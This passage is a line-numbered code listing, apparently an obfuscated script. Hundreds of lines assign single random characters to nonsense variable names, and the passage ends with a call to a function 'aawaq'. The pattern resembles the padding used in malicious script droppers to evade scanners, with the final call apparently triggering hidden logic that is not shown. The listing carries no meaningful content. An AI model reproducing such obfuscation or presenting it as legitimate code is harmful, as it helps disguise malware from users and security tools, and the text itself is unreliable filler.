740 | tuyufmmx = "C"; | |
741 | tuyufmmx = "Y"; | |
742 | tuyufmmx = "z"; | |
743 | tuyufmmx = "z"; | |
744 | tuyufmmx = "M"; | |
745 | tuyufmmx = "t"; | |
746 | tuyufmmx = "j"; | |
747 | tuyufmmx = "c"; | |
748 | tuyufmmx = "B"; | |
749 | tuyufmmx = "r"; | |
750 | tuyufmmx = "K"; | |
751 | tuyufmmx = "K"; | |
752 | tuyufmmx = "N"; | |
753 | tuyufmmx = "z"; | |
754 | tuyufmmx = "k"; | |
755 | tuyufmmx = "E"; | |
756 | tuyufmmx = "N"; | |
757 | tuyufmmx = "O"; | |
758 | tuyufmmx = "p"; | |
759 | tuyufmmx = "G"; | |
760 | tuyufmmx = "o"; | |
761 | qvazzc = "Y"; | |
762 | qvazzc = "S"; | |
763 | qvazzc = "g"; | |
764 | qvazzc = "A"; | |
765 | qvazzc = "g"; | |
766 | qvazzc = "V"; | |
767 | qvazzc = "Y"; | |
768 | qvazzc = "l"; | |
769 | qvazzc = "N"; | |
770 | qvazzc = "W"; | |
771 | qvazzc = "h"; | |
772 | qvazzc = "D"; | |
773 | qvazzc = "g"; | |
774 | qvazzc = "B"; | |
775 | qvazzc = "g"; | |
776 | qvazzc = "q"; | |
777 | qvazzc = "A"; | |
778 | qvazzc = "c"; | |
779 | qvazzc = "b"; | |
780 | qvazzc = "o"; | |
781 | qvazzc = "s"; | |
782 | qvazzc = "q"; | |
783 | qvazzc = "h"; | |
784 | qvazzc = "q"; | |
785 | qvazzc = "v"; | |
786 | qvazzc = "i"; | |
787 | axhdhf = "p"; | |
788 | axhdhf = "Z"; | |
789 | axhdhf = "D"; | |
790 | axhdhf = "M"; | |
791 | axhdhf = "x"; | |
792 | axhdhf = "y"; | |
793 | axhdhf = "W"; | |
794 | axhdhf = "g"; | |
795 | axhdhf = "C"; | |
796 | axhdhf = "v"; | |
797 | axhdhf = "q"; | |
798 | axhdhf = "a"; | |
799 | axhdhf = "Q"; | |
800 | axhdhf = "B"; | |
801 | axhdhf = "W"; | |
802 | axhdhf = "Y"; | |
803 | axhdhf = "j"; | |
804 | axhdhf = "p"; | |
805 | axhdhf = "b"; | |
806 | axhdhf = "d"; | |
807 | axhdhf = "T"; | |
808 | axhdhf = "x"; | |
809 | axhdhf = "r"; | |
810 | axhdhf = "y"; | |
811 | axhdhf = "n"; | |
812 | axhdhf = "n"; | |
813 | axhdhf = "G"; | |
814 | axhdhf = "p"; | |
815 | axhdhf = "a"; | |
816 | axhdhf = "F"; | |
817 | axhdhf = "A"; | |
818 | axhdhf = "r"; | |
819 | wwykzla = "U"; | |
820 | wwykzla = "x"; | |
821 | wwykzla = "T"; | |
822 | wwykzla = "H"; | |
823 | wwykzla = "f"; | |
824 | wwykzla = "d"; | |
825 | wwykzla = "A"; | |
826 | wwykzla = "W"; | |
827 | wwykzla = "M"; | |
828 | wwykzla = "l"; | |
829 | wwykzla = "H"; | |
830 | wwykzla = "E"; | |
831 | wwykzla = "Z"; | |
832 | wwykzla = "Z"; | |
833 | wwykzla = "n"; | |
834 | wwykzla = "E"; | |
835 | wwykzla = "p"; | |
836 | wwykzla = "X"; | |
837 | wwykzla = "o"; | |
838 | wwykzla = "L"; | |
839 | wwykzla = "L"; | |
840 | wwykzla = "k"; | |
841 | wwykzla = "c"; | |
842 | wwykzla = "g"; | |
843 | wwykzla = "O"; | |
844 | wwykzla = "I"; | |
845 | wwykzla = "Z"; | |
846 | wwykzla = "s"; | |
847 | wwykzla = "f"; | |
848 | wwykzla = "x"; | |
849 | pwnowbac = "x"; | |
850 | pwnowbac = "l"; | |
851 | pwnowbac = "d"; | |
852 | pwnowbac = "o"; | |
853 | pwnowbac = "O"; | |
854 | pwnowbac = "E"; | |
855 | pwnowbac = "H"; | |
856 | pwnowbac = "Y"; | |
857 | pwnowbac = "E"; | |
858 | pwnowbac = "G"; | |
859 | pwnowbac = "W"; | |
860 | pwnowbac = "S"; | |
861 | pwnowbac = "e"; | |
862 | pwnowbac = "c"; | |
863 | pwnowbac = "e"; | |
864 | pwnowbac = "y"; | |
865 | pwnowbac = "t"; | |
866 | pwnowbac = "N"; | |
867 | pwnowbac = "C"; | |
868 | pwnowbac = "f"; | |
869 | pwnowbac = "G"; | |
870 | pwnowbac = "o"; | |
871 | pwnowbac = "h"; | |
872 | pwnowbac = "L"; | |
873 | pwnowbac = "m"; | |
874 | pwnowbac = "q"; | |
875 | pwnowbac = "J"; | |
876 | pwnowbac = "g"; | |
877 | pwnowbac = "r"; | |
878 | pwnowbac = "N"; | |
879 | pwnowbac = "X"; | |
880 | pwnowbac = "X"; | |
881 | pwnowbac = "b"; | |
882 | pwnowbac = "u"; | |
883 | pwnowbac = "U"; | |
884 | pwnowbac = "r"; | |
885 | pwnowbac = "T"; | |
886 | pwnowbac = "R"; | |
887 | pwnowbac = "A"; | |
888 | pwnowbac = "R"; | |
889 | pwnowbac = "p"; | |
890 | hutztd = "p"; | |
891 | hutztd = "l"; | |
892 | hutztd = "K"; | |
893 | hutztd = "c"; | |
894 | hutztd = "m"; | |
895 | hutztd = "d"; | |
896 | hutztd = "i"; | |
897 | hutztd = "D"; | |
898 | hutztd = "s"; | |
899 | hutztd = "B"; | |
900 | hutztd = "d"; | |
901 | hutztd = "Z"; | |
902 | hutztd = "z"; | |
903 | hutztd = "x"; | |
904 | hutztd = "p"; | |
905 | hutztd = "J"; | |
906 | hutztd = "q"; | |
907 | hutztd = "b"; | |
908 | hutztd = "G"; | |
909 | hutztd = "a"; | |
910 | hutztd = "m"; | |
911 | hutztd = "Y"; | |
912 | hutztd = "l"; | |
913 | hutztd = "y"; | |
914 | hutztd = "k"; | |
915 | hutztd = "S"; | |
916 | hutztd = "W"; | |
917 | hutztd = "E"; | |
918 | hutztd = "z"; | |
919 | hutztd = "j"; | |
920 | hutztd = "a"; | |
921 | hutztd = "q"; | |
922 | hutztd = "x"; | |
923 | hutztd = "H"; | |
924 | hutztd = "J"; | |
925 | hutztd = "p"; | |
926 | hutztd = "q"; | |
927 | hutztd = "a"; | |
928 | hutztd = "O"; | |
929 | hutztd = "W"; | |
930 | hutztd = "K"; | |
931 | hutztd = "e"; | |
932 | hutztd = "a"; | |
933 | prxbmtd = "y"; | |
934 | prxbmtd = "e"; | |
935 | prxbmtd = "X"; | |
936 | prxbmtd = "g"; | |
937 | prxbmtd = "C"; | |
938 | prxbmtd = "O"; | |
939 | prxbmtd = "m"; | |
940 | vrsexu = "S"; | |
941 | fzloe = "S"; | |
942 | fzloe = "o"; | |
943 | fzloe = "A"; | |
944 | fzloe = "r"; | |
945 | fzloe = "K"; | |
946 | fzloe = "x"; | |
947 | fzloe = "X"; | |
948 | fzloe = "P"; | |
949 | fzloe = "h"; | |
950 | fzloe = "T"; | |
951 | fzloe = "Y"; | |
952 | fzloe = "I"; | |
953 | fzloe = "Y"; | |
954 | fzloe = "p"; | |
955 | fzloe = "P"; | |
956 | fzloe = "G"; | |
957 | fzloe = "s"; | |
958 | fzloe = "u"; | |
959 | fzloe = "F"; | |
960 | fzloe = "q"; | |
961 | fzloe = "U"; | |
962 | fzloe = "V"; | |
963 | fzloe = "v"; | |
964 | fzloe = "T"; | |
965 | fzloe = "L"; | |
966 | fzloe = "G"; | |
967 | fzloe = "b"; | |
968 | fzloe = "z"; | |
969 | fzloe = "V"; | |
970 | fzloe = "y"; | |
971 | fzloe = "c"; | |
972 | fzloe = "j"; | |
973 | fzloe = "p"; | |
974 | fzloe = "i"; | |
975 | fzloe = "l"; | |
976 | fzloe = "m"; | |
977 | fzloe = "E"; | |
978 | fzloe = "w"; | |
979 | fzloe = "j"; | |
980 | ygnqnp = "N"; | |
981 | ygnqnp = "Y"; | |
982 | ygnqnp = "c"; | |
983 | ygnqnp = "l"; | |
984 | ygnqnp = "b"; | |
985 | ygnqnp = "M"; | |
986 | ygnqnp = "P"; | |
987 | ygnqnp = "Z"; | |
988 | ygnqnp = "e"; | |
989 | ygnqnp = "E"; | |
990 | ygnqnp = "g"; | |
991 | ygnqnp = "O"; | |
992 | ygnqnp = "M"; | |
993 | ygnqnp = "x"; | |
994 | ygnqnp = "N"; | |
995 | ygnqnp = "b"; | |
996 | ygnqnp = "W"; | |
997 | ygnqnp = "t"; | |
998 | ygnqnp = "M"; | |
999 | ygnqnp = "x"; | |
1000 | ygnqnp = "H"; | |
1001 | ygnqnp = "r"; | |
1002 | ygnqnp = "f"; | |
1003 | ygnqnp = "M"; | |
1004 | ygnqnp = "Q"; | |
1005 | ygnqnp = "-"; | |
1006 | rkllmfjku = "h"; | |
1007 | rkllmfjku = "R"; | |
1008 | rkllmfjku = "F"; | |
1009 | rkllmfjku = "m"; | |
1010 | rkllmfjku = "S"; | |
1011 | rkllmfjku = "O"; | |
1012 | rkllmfjku = "N"; | |
1013 | rkllmfjku = "b"; | |
1014 | rkllmfjku = "X"; | |
1015 | rkllmfjku = "E"; | |
1016 | rkllmfjku = "d"; | |
1017 | rkllmfjku = "i"; | |
1018 | rkllmfjku = "r"; | |
1019 | rkllmfjku = "m"; | |
1020 | rkllmfjku = "W"; | |
1021 | rkllmfjku = "w"; | |
1022 | ozmarcfqb = "V"; | |
1023 | ozmarcfqb = "H"; | |
1024 | ozmarcfqb = "r"; | |
1025 | ozmarcfqb = "K"; | |
1026 | ozmarcfqb = "x"; | |
1027 | ozmarcfqb = "y"; | |
1028 | ozmarcfqb = "r"; | |
1029 | ozmarcfqb = "E"; | |
1030 | ozmarcfqb = "x"; | |
1031 | ozmarcfqb = "d"; | |
1032 | ozmarcfqb = "f"; | |
1033 | ozmarcfqb = "s"; | |
1034 | ozmarcfqb = "S"; | |
1035 | ozmarcfqb = "x"; | |
1036 | ozmarcfqb = "z"; | |
1037 | ozmarcfqb = "q"; | |
1038 | ozmarcfqb = "u"; | |
1039 | ozmarcfqb = "e"; | |
1040 | ozmarcfqb = "W"; | |
1041 | ozmarcfqb = "D"; | |
1042 | ozmarcfqb = "."; | |
1043 | dearp = "m"; | |
1044 | dearp = "V"; | |
1045 | dearp = "S"; | |
1046 | dearp = "C"; | |
1047 | yztbfvo = "h"; | |
1048 | yztbfvo = "K"; | |
1049 | yztbfvo = "R"; | |
1050 | yztbfvo = "B"; | |
1051 | yztbfvo = "f"; | |
1052 | yztbfvo = "D"; | |
1053 | yztbfvo = "k"; | |
1054 | yztbfvo = "g"; | |
1055 | yztbfvo = "u"; | |
1056 | yztbfvo = ":"; | |
1057 | tbalj = "j"; | |
1058 | tbalj = "x"; | |
1059 | tbalj = "i"; | |
1060 | tbalj = "I"; | |
1061 | rtbygvifv = "S"; | |
1062 | rtbygvifv = "v"; | |
1063 | rtbygvifv = "c"; | |
1064 | rtbygvifv = "m"; | |
1065 | rtbygvifv = "G"; | |
1066 | rtbygvifv = "r"; | |
1067 | rtbygvifv = "H"; | |
1068 | rtbygvifv = "N"; | |
1069 | rtbygvifv = "m"; | |
1070 | rtbygvifv = "d"; | |
1071 | rtbygvifv = "w"; | |
1072 | rtbygvifv = "j"; | |
1073 | rtbygvifv = "o"; | |
1074 | rtbygvifv = "0"; | |
1075 | ubuwls = "D"; | |
1076 | ubuwls = "w"; | |
1077 | ubuwls = "K"; | |
1078 | ubuwls = "E"; | |
1079 | ubuwls = "S"; | |
1080 | ubuwls = "W"; | |
1081 | ubuwls = "h"; | |
1082 | ubuwls = "D"; | |
1083 | ubuwls = "U"; | |
1084 | ijxhzyohe = "Q"; | |
1085 | ijxhzyohe = "w"; | |
1086 | ijxhzyohe = "k"; | |
1087 | ijxhzyohe = "d"; | |
1088 | ijxhzyohe = "k"; | |
1089 | ijxhzyohe = "J"; | |
1090 | ijxhzyohe = "T"; | |
1091 | ijxhzyohe = "B"; | |
1092 | ijxhzyohe = "F"; | |
1093 | ijxhzyohe = "p"; | |
1094 | ijxhzyohe = "k"; | |
1095 | dbffr = "x"; | |
1096 | dbffr = "W"; | |
1097 | dbffr = "a"; | |
1098 | dbffr = "H"; | |
1099 | dbffr = "F"; | |
1100 | dbffr = "n"; | |
1101 | dbffr = "R"; | |
1102 | dbffr = "I"; | |
1103 | dbffr = "Y"; | |
1104 | dbffr = "F"; | |
1105 | dbffr = "h"; | |
1106 | dbffr = "j"; | |
1107 | dbffr = "r"; | |
1108 | dbffr = "K"; | |
1109 | dbffr = "T"; | |
1110 | dbffr = "i"; | |
1111 | dbffr = "W"; | |
1112 | dbffr = "c"; | |
1113 | dbffr = "W"; | |
1114 | dbffr = "c"; | |
1115 | dbffr = "n"; | |
1116 | dbffr = "G"; | |
1117 | dbffr = "G"; | |
1118 | dbffr = "o"; | |
1119 | dbffr = "F"; | |
1120 | dbffr = "a"; | |
1121 | dbffr = "p"; | |
1122 | dbffr = "e"; | |
1123 | fsxyfgg = "W"; | |
1124 | fsxyfgg = "E"; | |
1125 | fsxyfgg = "K"; | |
1126 | fsxyfgg = "p"; | |
1127 | fsxyfgg = "e"; | |
1128 | fsxyfgg = "H"; | |
1129 | fsxyfgg = "I"; | |
1130 | fsxyfgg = "S"; | |
1131 | fsxyfgg = "i"; | |
1132 | fsxyfgg = "I"; | |
1133 | fsxyfgg = "b"; | |
1134 | fsxyfgg = "E"; | |
1135 | fsxyfgg = "u"; | |
1136 | fsxyfgg = "p"; | |
1137 | fsxyfgg = "U"; | |
1138 | fsxyfgg = "p"; | |
1139 | fsxyfgg = "k"; | |
1140 | fsxyfgg = "B"; | |
1141 | fsxyfgg = "g"; | |
1142 | fsxyfgg = "E"; | |
1143 | fsxyfgg = "y"; | |
1144 | fsxyfgg = "M"; | |
1145 | fsxyfgg = "E"; | |
1146 | fsxyfgg = "S"; | |
1147 | fsxyfgg = "t"; | |
1148 | fsxyfgg = "D"; | |
1149 | fsxyfgg = "x"; | |
1150 | fsxyfgg = "i"; | |
1151 | fsxyfgg = "g"; | |
1152 | fsxyfgg = "m"; | |
1153 | fsxyfgg = "r"; | |
1154 | fsxyfgg = "F"; | |
1155 | pgxbtj = "h"; | |
1156 | pgxbtj = "T"; | |
1157 | pgxbtj = "C"; | |
1158 | pgxbtj = "a"; | |
1159 | pgxbtj = "c"; | |
1160 | pgxbtj = "V"; | |
1161 | pgxbtj = "c"; | |
1162 | qoynj = "E"; | |
1163 | qoynj = "j"; | |
1164 | qoynj = "T"; | |
1165 | qoynj = "f"; | |
1166 | qoynj = "x"; | |
1167 | qoynj = "A"; | |
1168 | qoynj = "m"; | |
1169 | qoynj = "Q"; | |
1170 | qoynj = "S"; | |
1171 | qoynj = "o"; | |
1172 | qoynj = "k"; | |
1173 | qoynj = "D"; | |
1174 | qoynj = "L"; | |
1175 | qoynj = "E"; | |
1176 | qoynj = "e"; | |
1177 | qoynj = "H"; | |
1178 | qoynj = "j"; | |
1179 | qoynj = "r"; | |
1180 | qoynj = "Q"; | |
1181 | qoynj = "H"; | |
1182 | qoynj = "l"; | |
1183 | qoynj = "v"; | |
1184 | qoynj = "t"; | |
1185 | qoynj = "a"; | |
1186 | qoynj = "k"; | |
1187 | qoynj = "Z"; | |
1188 | qoynj = "I"; | |
1189 | qoynj = "r"; | |
1190 | qoynj = "L"; | |
1191 | qoynj = "Z"; | |
1192 | qoynj = "K"; | |
1193 | qoynj = "J"; | |
1194 | qoynj = "c"; | |
1195 | qoynj = "c"; | |
1196 | qoynj = "Z"; | |
1197 | qoynj = "T"; | |
1198 | qoynj = "n"; | |
1199 | qoynj = "T"; | |
1200 | qoynj = "r"; | |
1201 | qoynj = "g"; | |
1202 | csweau = "f"; | |
1203 | csweau = "X"; | |
1204 | csweau = "l"; | |
1205 | csweau = "F"; | |
1206 | csweau = "M"; | |
1207 | csweau = "B"; | |
1208 | csweau = "m"; | |
1209 | csweau = "w"; | |
1210 | csweau = "a"; | |
1211 | csweau = "i"; | |
1212 | csweau = "U"; | |
1213 | csweau = "o"; | |
1214 | csweau = "z"; | |
1215 | csweau = "C"; | |
1216 | csweau = "R"; | |
1217 | csweau = "q"; | |
1218 | csweau = "q"; | |
1219 | csweau = "P"; | |
1220 | csweau = "C"; | |
1221 | csweau = "h"; | |
1222 | csweau = "G"; | |
1223 | csweau = "v"; | |
1224 | mhendmw = "P"; | |
1225 | mhendmw = "W"; | |
1226 | mhendmw = "m"; | |
1227 | mhendmw = "c"; | |
1228 | mhendmw = "d"; | |
1229 | mhendmw = "p"; | |
1230 | mhendmw = "U"; | |
1231 | mhendmw = "q"; | |
1232 | mhendmw = "N"; | |
1233 | mhendmw = "r"; | |
1234 | mhendmw = "X"; | |
1235 | mhendmw = "d"; | |
1236 | mhendmw = "y"; | |
1237 | mhendmw = "W"; | |
1238 | mhendmw = "e"; | |
1239 | mhendmw = "k"; | |
1240 | mhendmw = "z"; | |
1241 | mhendmw = "L"; | |
1242 | mhendmw = "L"; | |
1243 | vwoij = "f"; | |
1244 | vwoij = "I"; | |
1245 | vwoij = "Q"; | |
1246 | vlxzyu = "h"; | |
1247 | vlxzyu = "O"; | |
1248 | vlxzyu = "B"; | |
1249 | vlxzyu = "Y"; | |
1250 | vlxzyu = "q"; | |
1251 | vlxzyu = "P"; | |
1252 | vlxzyu = "R"; | |
1253 | vlxzyu = "_"; | |
1254 | xfzcxqyu = "E"; | |
1255 | xfzcxqyu = "i"; | |
1256 | xfzcxqyu = "i"; | |
1257 | xfzcxqyu = "D"; | |
1258 | xfzcxqyu = "X"; | |
1259 | xfzcxqyu = "Z"; | |
1260 | xfzcxqyu = "f"; | |
1261 | xfzcxqyu = "c"; | |
1262 | xfzcxqyu = "H"; | |
1263 | xfzcxqyu = "q"; | |
1264 | xfzcxqyu = "M"; | |
1265 | xfzcxqyu = "O"; | |
1266 | xfzcxqyu = "F"; | |
1267 | xfzcxqyu = "c"; | |
1268 | xfzcxqyu = "2"; | |
1269 | cljzhziez = "M"; | |
1270 | cljzhziez = "t"; | |
1271 | cljzhziez = "k"; | |
1272 | cljzhziez = "m"; | |
1273 | cljzhziez = "S"; | |
1274 | cljzhziez = "t"; | |
1275 | cljzhziez = "i"; | |
1276 | cljzhziez = "T"; | |
1277 | cljzhziez = "X"; | |
1278 | cljzhziez = "S"; | |
1279 | cljzhziez = "r"; | |
1280 | cljzhziez = "B"; | |
1281 | cljzhziez = "g"; | |
1282 | cljzhziez = "W"; | |
1283 | cljzhziez = "u"; | |
1284 | cljzhziez = "O"; | |
1285 | cljzhziez = "Q"; | |
1286 | cljzhziez = "p"; | |
1287 | cljzhziez = "F"; | |
1288 | cljzhziez = "l"; | |
1289 | cljzhziez = "\\"; | |
1290 | sncpdnb = "F"; | |
1291 | sncpdnb = "g"; | |
1292 | sncpdnb = "l"; | |
1293 | sncpdnb = "R"; | |
1294 | sncpdnb = "r"; | |
1295 | sncpdnb = "i"; | |
1296 | sncpdnb = "L"; | |
1297 | sncpdnb = "I"; | |
1298 | sncpdnb = "r"; | |
1299 | sncpdnb = "p"; | |
1300 | sncpdnb = "c"; | |
1301 | sncpdnb = "h"; | |
1302 | sncpdnb = "U"; | |
1303 | sncpdnb = "G"; | |
1304 | sncpdnb = "r"; | |
1305 | sncpdnb = "l"; | |
1306 | sncpdnb = "J"; | |
1307 | sncpdnb = "w"; | |
1308 | sncpdnb = "H"; | |
1309 | sncpdnb = "T"; | |
1310 | sncpdnb = "q"; | |
1311 | sncpdnb = "W"; | |
1312 | sncpdnb = "b"; | |
1313 | sncpdnb = "Y"; | |
1314 | sncpdnb = "w"; | |
1315 | sncpdnb = "A"; | |
1316 | sncpdnb = "o"; | |
1317 | sncpdnb = "M"; | |
1318 | sncpdnb = "K"; | |
1319 | sncpdnb = "z"; | |
1320 | sncpdnb = "B"; | |
1321 | sncpdnb = "H"; | |
1322 | sncpdnb = "L"; | |
1323 | sncpdnb = "E"; | |
1324 | inzvqsy = "M"; | |
1325 | inzvqsy = "l"; | |
1326 | inzvqsy = "m"; | |
1327 | inzvqsy = "k"; | |
1328 | inzvqsy = "F"; | |
1329 | inzvqsy = "r"; | |
1330 | inzvqsy = "i"; | |
1331 | inzvqsy = "T"; | |
1332 | inzvqsy = "M"; | |
1333 | inzvqsy = "y"; | |
1334 | inzvqsy = "u"; | |
1335 | inzvqsy = "c"; | |
1336 | inzvqsy = "q"; | |
1337 | inzvqsy = "L"; | |
1338 | inzvqsy = "r"; | |
1339 | inzvqsy = "R"; | |
1340 | inzvqsy = "A"; | |
1341 | inzvqsy = "h"; | |
1342 | rntemotzz = "X"; | |
1343 | rntemotzz = "g"; | |
1344 | rntemotzz = "b"; | |
1345 | rntemotzz = "i"; | |
1346 | rntemotzz = "H"; | |
1347 | rntemotzz = "q"; | |
1348 | rntemotzz = "d"; | |
1349 | rntemotzz = "Y"; | |
1350 | rntemotzz = "z"; | |
1351 | rntemotzz = "g"; | |
1352 | rntemotzz = "E"; | |
1353 | rntemotzz = "j"; | |
1354 | rntemotzz = "G"; | |
1355 | rntemotzz = "H"; | |
1356 | rntemotzz = "p"; | |
1357 | rntemotzz = "d"; | |
1358 | rntemotzz = "v"; | |
1359 | rntemotzz = "T"; | |
1360 | rntemotzz = "U"; | |
1361 | rntemotzz = "O"; | |
1362 | rntemotzz = "j"; | |
1363 | rntemotzz = "I"; | |
1364 | rntemotzz = "k"; | |
1365 | rntemotzz = "S"; | |
1366 | rntemotzz = "g"; | |
1367 | rntemotzz = "v"; | |
1368 | rntemotzz = "z"; | |
1369 | rntemotzz = "s"; | |
1370 | rntemotzz = "o"; | |
1371 | rntemotzz = "X"; | |
1372 | rntemotzz = "t"; | |
1373 | rntemotzz = "y"; | |
1374 | rntemotzz = "b"; | |
1375 | ngybeceel = "T"; | |
1376 | ngybeceel = "c"; | |
1377 | ngybeceel = "N"; | |
1378 | ngybeceel = "f"; | |
1379 | ngybeceel = "f"; | |
1380 | ngybeceel = "q"; | |
1381 | ngybeceel = "M"; | |
1382 | ngybeceel = "I"; | |
1383 | ngybeceel = "Q"; | |
1384 | ngybeceel = "H"; | |
1385 | ngybeceel = "T"; | |
1386 | ngybeceel = "i"; | |
1387 | ngybeceel = "I"; | |
1388 | ngybeceel = "V"; | |
1389 | ngybeceel = "P"; | |
1390 | ngybeceel = "H"; | |
1391 | ngybeceel = "U"; | |
1392 | ngybeceel = "L"; | |
1393 | ngybeceel = "a"; | |
1394 | ngybeceel = "Q"; | |
1395 | ngybeceel = "F"; | |
1396 | ngybeceel = "A"; | |
1397 | ngybeceel = "H"; | |
1398 | ngybeceel = "t"; | |
1399 | ngybeceel = "I"; | |
1400 | ngybeceel = "r"; | |
1401 | ngybeceel = "U"; | |
1402 | ngybeceel = "a"; | |
1403 | ngybeceel = "f"; | |
1404 | ngybeceel = "J"; | |
1405 | ngybeceel = "h"; | |
1406 | ngybeceel = "G"; | |
1407 | ngybeceel = "c"; | |
1408 | ngybeceel = "P"; | |
1409 | ngybeceel = "J"; | |
1410 | ngybeceel = "O"; | |
1411 | ngybeceel = "b"; | |
1412 | ngybeceel = "g"; | |
1413 | ngybeceel = "y"; | |
1414 | ngybeceel = "m"; | |
1415 | ngybeceel = "5"; | |
1416 | aawaq ( ); |
|